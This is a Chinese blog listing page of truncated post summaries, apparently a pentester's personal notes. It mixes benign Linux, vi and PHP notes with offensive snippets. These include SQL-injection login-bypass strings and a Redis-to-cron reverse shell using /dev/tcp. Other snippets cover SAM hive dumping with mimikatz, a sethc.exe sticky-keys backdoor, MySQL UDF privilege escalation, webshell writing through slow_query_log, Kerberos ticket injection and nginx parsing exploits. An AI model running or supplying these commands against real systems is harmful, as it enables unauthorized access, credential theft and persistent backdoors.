摘要:
asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or'admin'or 1=1#P 阅读全文
posted @ 2019-07-04 21:22
morris_pass_A
阅读(20839)
评论(0)
推荐(0)
摘要:
常用端口号:代理服务器常用以下端口:(1). HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080(2). SOCKS代理协议服务器常用端口号:1080(3). FTP(文件传输)协议代理服务器常用端口号:21(4). Telnet(远程登录)协议代理服务器常用端口:23 阅读全文
posted @ 2019-07-04 21:15
morris_pass_A
阅读(340)
评论(0)
推荐(0)
摘要:
阅读全文
posted @ 2019-07-04 20:49
morris_pass_A
阅读(183)
评论(0)
推荐(0)
摘要:
序列化__sleep的时候必要返回一个数组,一定返回对象的属性,否则报错,键值的key不重要,bbbbbbbbb根本不重要,主要是值是不是对象的属性的名字对上,也就是aa就不正确,a正确 这里可以看见如果sleep里面返回的有对应属性的名字a那么后续的操作也就是$de->a='123';,最后序列化 阅读全文
posted @ 2019-07-04 20:47
morris_pass_A
阅读(208)
评论(0)
推荐(0)
摘要:
web服务器只是提供静态网页解析(如apache),或者提供跳转的这么一种服务。而web中间件或者叫做应用服务器(其包含web容器)可以解析动态语言,比如tomcat可以解析jsp(因为tomcat含有jsp容器),当然它也可以解析静态资源,因此它既是web中间件也是web服务器。不过tomcat解 阅读全文
posted @ 2019-07-04 19:07
morris_pass_A
阅读(1543)
评论(0)
推荐(0)
摘要:
./redis-cli -h 192.168.11.125 -p 58023 set x "\n\n\n*/1 * * * * bash-i &> /dev/tcp/192.168xx/xxx ) 0>&1 \n\n\n" config set dir /var/spool/cron config 阅读全文
posted @ 2019-07-04 19:04
morris_pass_A
阅读(144)
评论(0)
推荐(0)
摘要:
useradd ceshi #添加用户 usermod -g root ceshi #添加用户到用户组 非交互式更改密码 echo doiido:123456 | chpasswd echo '123456'| passwd --stdin doiido 更改权限 第一个ALL是指网络中的主机 第二 阅读全文
posted @ 2019-07-04 19:01
morris_pass_A
阅读(342)
评论(0)
推荐(0)
摘要:
当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。 mimikatz也是可以看见sid的 3. 票据注入 使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器 阅读全文
posted @ 2019-07-04 18:44
morris_pass_A
阅读(214)
评论(0)
推荐(0)
摘要:
常用的几种跨域处理方法: 1、JSONP 2、CORS策略 3、document.domain+iframe的设置 4、HTML5的postMessage 5、使用window.name来进行跨域 JSONP是通过src属性来跨域,动态添加一个<script>标签来实现。 CORS "跨域资源共享" 阅读全文
posted @ 2019-07-04 18:34
morris_pass_A
阅读(104)
评论(0)
推荐(0)
摘要:
Metasploit 「跨网段攻击」添加路由表 run get_local_subnets run autoroute -s 172.16.63.0/24 background route print use auxiliary/scanner/portscan/tcp show options 路 阅读全文
posted @ 2019-07-04 18:33
morris_pass_A
阅读(147)
评论(0)
推荐(0)
摘要:
使用SAMInside获取用户密码 reg save hklm\sam C:/sam.hivereg save hklm\system C:/system.hive 用cain解密 或者复制sam到自己本机上然后再用 mimikatz获取登陆过的账号密码 mimikatz log privilege 阅读全文
posted @ 2019-07-04 18:23
morris_pass_A
阅读(580)
评论(0)
推荐(0)
摘要:
密码破解 shift后门 shift控制 Windows c:/system32/sethc.exe 换成cmd.exe 追加自己的公钥 ssh-keygen 生成公钥ssh-keygen -t rsa cat ~/.ssh/id_rsa.pub 获取自己的公钥 连接的时候可以指定私钥来连接 ssh 阅读全文
posted @ 2019-07-04 18:02
morris_pass_A
阅读(200)
评论(0)
推荐(0)
摘要:
MOF提权 UDF提权 select load_file('/var/www/html/udf/udf.so') into dumpfile "/var/lib/mysql/udf.dll" create function sys_eval returns string soname 'udf.so 阅读全文
posted @ 2019-07-04 17:57
morris_pass_A
阅读(333)
评论(0)
推荐(0)
摘要:
信息收集: Google Bing Baidu Yahoo 子域名挖掘机 主站爬取-crossadmin.xml Whois 反查询 https://www.benmi.com Ip反查询 Site.ip138.com 工具:Subdomainbrute sublist3r 服务信息收集: 大小写敏 阅读全文
posted @ 2019-07-04 17:49
morris_pass_A
阅读(119)
评论(0)
推荐(0)
摘要:
开启日志的情况下 access.log 用burp让其转义,然后用文件包含可以执行其中代码 general_log slow.log set global slow_query_log=1; set global slow_query_log_file='D://404.php' -- 地址 sel 阅读全文
posted @ 2019-07-04 17:14
morris_pass_A
阅读(160)
评论(0)
推荐(0)
摘要:
以下转自clancyb00m的github nginx nginx <8.03 空字节代码执行漏洞 影响版本:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 上传图片马然后这样访问: 就会执行PHP代码 nginx 1.6.2 如果hack.php不存在,就会以.ph 阅读全文
posted @ 2019-07-04 17:00
morris_pass_A
阅读(616)
评论(0)
推荐(0)
摘要:
使用sqlmap用dump就要进行拖K,在本地C中的sqlmap,在c盘搜索sqlmap/outpot/ip/dump/中 sqlmap的语法结构 分为免python环境的和需要python python sqlmap.py -(u|r) "(url|text)" -p "id" -u url -r 阅读全文
posted @ 2019-07-04 16:43
morris_pass_A
阅读(239)
评论(0)
推荐(0)
摘要:
nslookup正向解析为ip地址 nslookup www.baidu.com nslookup -q=ptr ip地址 逆向解析域名地址 nslookup -q=mx 查询邮件交换记录 nslookup set q=mx netstat -anb 显示各种网络相关信息 tasklist 看系统上 阅读全文
posted @ 2019-07-04 16:38
morris_pass_A
阅读(156)
评论(0)
推荐(0)
摘要:
Mid(database() from 1 for 1)==mid(databse(),1,1) 在数据库中字符型字段中条件值为false可以获取全部数据 数据库一般有三种报错 (1)Extractvalue()中第一个为错误参数就会错误报出第二个参数语句 (2)Floor(rand(0)*2) 插 阅读全文
posted @ 2019-07-04 16:28
morris_pass_A
阅读(165)
评论(0)
推荐(0)
摘要:
基本的连接使用 php中PDO的使用 php中面向对象的使用mysqli() php中面向过程的使用mysqli_connect() 关于PDO 注意上面bindParam只能用在PDO中 解决占位符中文不支持的办法占位: 阅读全文
posted @ 2019-07-04 16:09
morris_pass_A
阅读(138)
评论(0)
推荐(0)
摘要:
定义和用法 addslashes() addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。 预定义字符是: 单引号(') 双引号(") 反斜杠(\) NULL 默认地,PHP 对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。所以您不应对已转义过 阅读全文
posted @ 2019-07-04 15:32
morris_pass_A
阅读(427)
评论(0)
推荐(0)
摘要:
11.array_splice(array,start,length,array) 去掉数组中的某一部分并用其它值取代 Array_splice(源数组,start位置,stop位置,更换的数组) (操作是在源数组进行,所以输出$a) 12.array_unique删除数组中的重复值 13.arra 阅读全文
posted @ 2019-07-04 15:18
morris_pass_A
阅读(125)
评论(0)
推荐(0)
摘要:
用户操作 useradd/adduser 创建用户 passwd 修改用户密码 userdel 删除用户 usermod 修改用户信息 -g<群组> 修改用户所属群组 -G<群组> 修改用户所属的附加群组 -l<帐户名> 修改账户名称 -u 修改用户ID -L锁定用户密码 -U 解除密码锁定 add 阅读全文
posted @ 2019-07-04 14:52
morris_pass_A
阅读(136)
评论(0)
推荐(0)
摘要:
root:$6$r0DcB6cchtgqQqNP$UjLh8/5SB2ixbzLU10qYMpBP.NbOp/poyfzoGZFiEiVXO2lWABrB5SU/RWH/fDgkHzNYSKvfbbfpCZRkVBpFZ1::0:99999:7::: $6$开头的,表明是用SHA-512加密的 $r 阅读全文
posted @ 2019-07-04 14:51
morris_pass_A
阅读(177)
评论(0)
推荐(0)
摘要:
Basic命令 :set nu设置行号 :set nonu 取消行号 /word 查询名叫word的文本,n键 是下一个 :%s/word1/word2/g 替换所有word1为word2 如果替换每行第一个则去掉/g x,X x为向后删除,X为向前删除 dd 删除游标所在的那一整行 yy 复制游标 阅读全文
posted @ 2019-07-04 14:45
morris_pass_A
阅读(139)
评论(0)
推荐(0)
摘要:
basic命令 touch 新建文件 mkdir新建文件夹 rmdir 删除文件夹 rm - 删除文件 -r 递归 -f 强制 >1.txt 定向到文件中(覆盖) >>追加到文件中 tar -cvf filename.tar filename1 filename2 ... (打包命令) tar -x 阅读全文
posted @ 2019-07-04 14:40
morris_pass_A
阅读(173)
评论(0)
推荐(0)
摘要:
很久以前注册的账号密码,什么也不知道,整理一下 嗯,重新开始 阅读全文
posted @ 2019-07-04 13:56
morris_pass_A
阅读(126)
评论(0)
推荐(0)
浙公网安备 33010602011771号